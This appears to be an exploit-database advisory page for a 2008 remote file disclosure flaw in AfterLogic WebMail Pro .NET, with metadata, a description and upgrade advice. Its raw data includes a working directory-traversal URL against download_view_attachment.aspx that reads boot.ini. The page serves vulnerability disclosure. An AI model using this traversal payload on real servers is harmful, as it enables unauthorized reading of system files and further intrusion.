header-logo
Suggest Exploit
vendor:
WebMail Pro .NET
by:
M.o.B
7.5
CVSS
HIGH
Remote File Disclosure
200
CWE
Product Name: WebMail Pro .NET
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: a:afterlogic:webmail_pro_net
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

AfterLogic WebMail Pro .NET Remote File Disclosure Vulnerability

AfterLogic WebMail Pro .NET is prone to a remote file-disclosure vulnerability because it fails to properly sanitize user-supplied input. An attacker can exploit this issue to view sensitive files on the affected computer, potentially resulting in further attacks.

Mitigation:

Users should upgrade to the latest version of AfterLogic WebMail Pro .NET. Additionally, users should ensure that all input is properly sanitized.
Source

Exploit-DB raw data:

homepage: www.afterlogic.com
example:
http://www.xxx.com/webmail-pro-net/download_view_attachment.aspx?temp_filename=../../../../../../../../../../../../../../../../../../boot.ini
-=M.o.B=-

# milw0rm.com [2008-01-16]

Navigation

Suggest Exploit

Services By CQR